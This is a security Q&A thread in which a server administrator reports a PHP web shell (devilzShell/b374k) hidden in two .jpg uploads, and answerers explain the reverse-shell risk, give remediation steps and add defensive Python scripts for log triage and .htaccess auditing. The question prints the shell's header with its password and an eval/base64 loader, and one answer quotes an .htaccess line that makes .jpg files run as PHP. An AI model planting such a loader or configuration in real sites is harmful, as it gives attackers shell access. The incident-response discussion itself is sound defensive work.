Am I really compromised?

3

So our IT manager called me and told me that someone sent him the contents of our server's /etc/passwd, and said that this man did an SQL injection on our server. So I checked all the user history logs and found nothing; I also checked auth.log, but nothing suspicious happened.

Then I installed clamav, scanned the whole directory tree using clamscan -r -i /, and found these files:

/home/project/prod/project.api/public/images/rOIqOd1sz.jpg
/home/project/prod/project.api/public/images/rOXmZ1Nsz.jpg

So basically they are images, but they contain a script. Here is the content of the script:

<?php
//
// devilzShell <[php]>
// ^^^^^^^^^^^^
// author: b374k
// greets: devilzc0der(s) and all of you who love peace and freedom
//
//
// ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
// Jayalah Indonesiaku


$shell_name = "Nadipa Luvchuterusz ~\ PERCAYA :) ";
$shell_fake_name = "root@Lvchtrzs:~\ Login ";
$shell_title = " ~/ ".$shell_name." \~";
$shell_version = "v2";
$shell_password = "riska";
$shell_fav_port = "12345";
$shell_color = "Black";
$shell_code = "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";error_reporting(0);@set_time_limit(0);eval("?>".gzuncompress(base64_decode($shell_code)));
?>

The strange part is that this script has been there since April, but now it is September, so I think this is not the cause. So I am using netstat to look for open ports, but again there are no suspicious results. I really need your help, guys.

Thanks

    
asked by spacetrack 19.09.2017 - 05:16
source

2 answers

6

As best I can tell, someone uploaded this image to your server and then tried to execute it by browsing to the image's URL path (which may have been executed as PHP, depending on your security settings).

Even if it was executed, the point of the code is most likely a reverse shell. I did a bit of googling, and while what you have is v2 of the code, v1 looks like (source code on github ... safe-ish). It should be noted that the use of a reverse shell would NOT show up in audit logs or user logs ... you should instead check the web server's access logs for the last 6 months or so for anyone accessing one of these .jpg files.

If the person were able to open a reverse shell this way, in theory, they would only have access as the user running the service ... and unless you've done something really bad, that means they had shell access as a restricted apache user, which has full read access to /etc/passwd just like every other user on the box.

ca@ca-chi:~$ ls -lah /etc/passwd
-rw-r--r-- 1 root root 2.0K Aug 28 13:09 /etc/passwd

And to be perfectly honest ... who cares? Here is the cat /etc/passwd of my private VPS ... done by a non-sudo user:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
ntp:x:111:115::/home/ntp:/bin/false
git:x:1000:1000:Gogs Git User:/opt/containers/gogs/data/git:/bin/bash
ca:x:1001:1001:,,,:/home/ca:/bin/bash

If you take a look at the file ... it basically contains:

DESCRIPTION
       /etc/passwd contains one line for each user account, with seven fields
       delimited by colons (“:”). These fields are:
       ·   login name
       ·   optional encrypted password
       ·   numerical user ID
       ·   numerical group ID
       ·   user name or comment field
       ·   user home directory
       ·   optional user command interpreter

(source)

Note that the only relevant part of this is the optional encrypted password, which by default on most systems is simply replaced with an x (feel free to check yours ... the file I posted is not modified from its original content).

They would also have read-only access to the source of all the PHP files in the webroot. That means all configuration settings such as the username / password for the MySQL database and any source / encryption keys / user tables / salts / peppers / ... etc. This is kind of bad; you should probably update the passwords on pretty much everything.

Now, it should be noted that they should never have gotten this far ... the fact that your server can execute uploaded files as PHP is disastrous ... and should be fixed as soon as possible. Also, if that part of your server wasn't secure ... who knows how else they got in. Personally, I would Nuke From Orbit; it's the only way to be sure.

  • I would stand up a new VPS with better security settings for PHP
  • Migrate the TRUSTED source code from VERSION CONTROL (specifically not from the possibly infected server)
  • Check the folders created to hold user content to verify that they cannot contain CGI
  • Dump the original server's SQL (if applicable) to XML or a .SQL file and run some regex searches on it to verify that it doesn't contain anything suspicious.
  • Migrate the user content (images, files, etc.)
  • Lock all user accounts and force a password change via email at next login
  • Notify your user base that you have had a security breach and that user data such as Username / Email / hashed?-password (I hope you stored them properly) are out in the wild, and it's only a matter of time before the passwords are cracked.

Good Luck

    
answered 19.09.2017 - 06:48
source
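The access-log check suggested in the answer above, as an added example that is not part of the original answer: it parses combined-format access-log lines and groups, per client IP, requests to image paths that use a method other than GET/HEAD or carry a query string. The log lines, client IPs and the /images/ URL prefix are constructed for illustration; only the two file names come from the question.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" access-log format.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
IMAGE_RE = re.compile(r'\.(?:jpe?g|png|gif)$', re.IGNORECASE)

def triage(lines):
    """Group odd requests to image paths by client IP.

    A browser fetches an image with a plain GET; a POST or a query string
    aimed at a .jpg suggests the file is being driven as a script.
    """
    report = defaultdict(lambda: {"first": None, "last": None, "hits": []})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path, _, query = m["target"].partition("?")
        if not IMAGE_RE.search(path):
            continue
        if m["method"] in ("GET", "HEAD") and not query:
            continue  # ordinary image fetch
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entry = report[m["ip"]]
        entry["first"] = min(filter(None, (entry["first"], ts)))
        entry["last"] = max(filter(None, (entry["last"], ts)))
        entry["hits"].append((ts, m["method"], path, int(m["status"])))
    return dict(report)

# Constructed sample lines (documentation IP ranges, assumed URL prefix).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Apr/2017:02:11:09 +0000] "POST /images/rOIqOd1sz.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [14/Apr/2017:09:30:00 +0000] "GET /images/logo.png HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Sep/2017:23:40:51 +0000] "GET /images/rOXmZ1Nsz.jpg?x=1 HTTP/1.1" 200 7301 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, entry in triage(SAMPLE_LOG).items():
        print(ip, entry["first"].isoformat(), entry["last"].isoformat())
        for ts, method, path, status in entry["hits"]:
            print("   ", ts.isoformat(), method, path, status)
```

Plain GETs are skipped to keep noise down, and request bodies are not logged, so for the two file names ClamAV reported it is worth listing every request regardless of method. The first and last timestamps per IP give the timeline between the April upload and the September report.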
1

From my experience, it seems that if you had the right settings in your PHP init, those files should not be able to execute the PHP code inside, since they end in .jpg instead of .php. So the attacker should not be able to open a webshell on your server.

Although if you have this line in .htaccess, they will certainly be able to execute that code.

AddType application/x-httpd-php .jpg

Of course, assuming you have been compromised and taking all the necessary actions is the way to deal with this problem.

    
answered 19.09.2017 - 14:51
source
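One way to check a webroot for the kind of .htaccess line quoted in the answer above, as an added example that is not part of the original answer: it walks a directory tree and reports AddType/AddHandler lines that map a non-PHP extension to a PHP handler, plus SetHandler/ForceType lines that hand every file in scope to PHP. The function names and the sample file content are constructed for illustration.

```python
import os
import re

# Apache directives that can route a file to the PHP interpreter.
DIRECTIVE_RE = re.compile(
    r'^\s*(AddType|AddHandler|SetHandler|ForceType)\s+(\S+)(.*)$',
    re.IGNORECASE)

def audit_htaccess(text):
    """Return (line_no, directive, detail) for each line that hands
    something other than .php/.phtml files to PHP."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # comment
        m = DIRECTIVE_RE.match(line)
        if not m or "php" not in m.group(2).lower():
            continue
        if m.group(1).lower() in ("sethandler", "forcetype"):
            # Applies to every file in the enclosing scope; review any
            # surrounding <Files>/<FilesMatch> block by hand.
            findings.append((no, m.group(1), "all files in scope"))
            continue
        exts = [e.lower().lstrip(".") for e in m.group(3).split()]
        bad = [e for e in exts if not re.fullmatch(r"php\d?|phtml", e)]
        if bad:
            findings.append((no, m.group(1), ",".join(bad)))
    return findings

def scan_webroot(root):
    """Audit every .htaccess under root; returns {path: findings}."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = audit_htaccess(fh.read())
            if found:
                results[path] = found
    return results

# Constructed sample: the line quoted in the answer plus a normal mapping.
SAMPLE = """\
# uploads directory
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .php
"""

if __name__ == "__main__":
    print(audit_htaccess(SAMPLE))
```

The same directives can also live in the main server or virtual-host configuration, which this walk does not read, so those files need the same review.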
